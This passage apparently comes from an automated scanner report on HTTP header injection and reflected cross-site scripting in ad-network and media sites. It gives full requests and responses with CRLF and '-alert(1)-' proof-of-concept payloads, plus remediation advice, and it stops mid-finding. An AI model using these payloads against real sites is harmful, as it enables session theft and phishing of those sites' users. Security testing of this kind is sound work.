User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13a44
d08cd4fa359/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64
Date: Mon, 16 May 2011 01:26:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/pmv.telegraph.tg/sponsored

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 858b0%0d%0a7d93e849469 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /858b0%0d%0a7d93e849469/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/858b0
7d93e849469/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.9. http://c7.zedo.com/utils/ecSet.js [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 745cd%0d%0aa239816aaf was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=745cd%0d%0aa239816aaf&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452; FFChanCap=1595B496,121#543485#876543#675101#543481#675099|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1; FFSkp=305,3603,15,1:; FFcat=305,3603,15:496,121,14:496,121,7:496,121,9; FFad=0:15:1:5; FFCap=1595B305,212785|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 745cd
a239816aaf;expires=Wed, 15 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "637af42d-1f5-47f291fef3640"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6911
Date: Mon, 16 May 2011 01:30:24 GMT
Connection: close

5. Cross-site scripting (reflected) previous next
There are 126 instances of this issue:

http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]
http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.turn.com/server/pixel.htm [sp parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleBackground parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleHover parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleMiddleLine parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleSelected parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleText parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleTextHover parameter]
http://ahome.disney.go.com/globalelements/chrome.css [styleTextSelected parameter]
http://choices.truste.com/ca [c parameter]
http://choices.truste.com/ca [h parameter]
http://choices.truste.com/ca [plc parameter]
http://choices.truste.com/ca [w parameter]
http://choices.truste.com/ca [zi parameter]
http://dcl.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/whyChooseDisney-Cruise.png [REST URL parameter 1]
http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico [REST URL parameter 1]
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [&qqElement parameter]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 1]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 2]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 3]
http://dcl.wdpromedia.com/services/en_US/htmlQQ/jsQuickQuote [REST URL parameter 4]
http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 1]
http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 2]
http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]
http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]
http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]
http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]
http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]
http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]
http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mbox parameter]
http://i.usatoday.net/asp/usatly/handler.ashx [longUrl parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://pastebin.com/favicon.ico [REST URL parameter 1]
http://pastebin.com/i/fixed.css [REST URL parameter 1]
http://pastebin.com/i/fixed.css [REST URL parameter 2]
http://pastebin.com/i/style.css [REST URL parameter 1]
http://pastebin.com/i/style.css [REST URL parameter 2]
http://pastebin.com/trends [REST URL parameter 1]
http://pastebin.com/trends [name of an arbitrarily supplied request parameter]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F1900_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F1962_VB_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F2553_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F5676_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F6580_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/F8394_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NA908_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NB750_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NC208_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NC330_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NC873_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/ND797_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/h6381_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/j7804_400 [REST URL parameter 4]
http://s7d5.scene7.com/is/image/bluestembrands/n4728_400 [REST URL parameter 4]
http://sales.liveperson.net/hc/71737897/ [msessionkey parameter]
http://serv.adspeed.com/ad.php [ht parameter]
http://serv.adspeed.com/ad.php [wd parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
http://sony.links.channelintelligence.com/pages/prices.asp [ssku parameter]
http://sony.tt.omtrdc.net/m2/sony/mbox/ajax [mbox parameter]
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/mbox/standard [mbox parameter]
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mbox parameter]
http://sonycomputerentertai.tt.omtrdc.net/m2/sonycomputerentertai/sc/standard [mboxId parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://wow.weather.com/weather/wow/module/USNY0400 [config parameter]
http://wow.weather.com/weather/wow/module/USNY0400 [target parameter]
https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header]
http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie]
http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ce2"-alert(1)-"bc963da0405 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:28:23 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmo
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad20f"-alert(1)-"672c7ef153f was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:29:21 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.htm
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5009"-alert(1)-"6877c3dfa7c was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:01 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
optimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c09c"-alert(1)-"29bf5f9ba6d was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

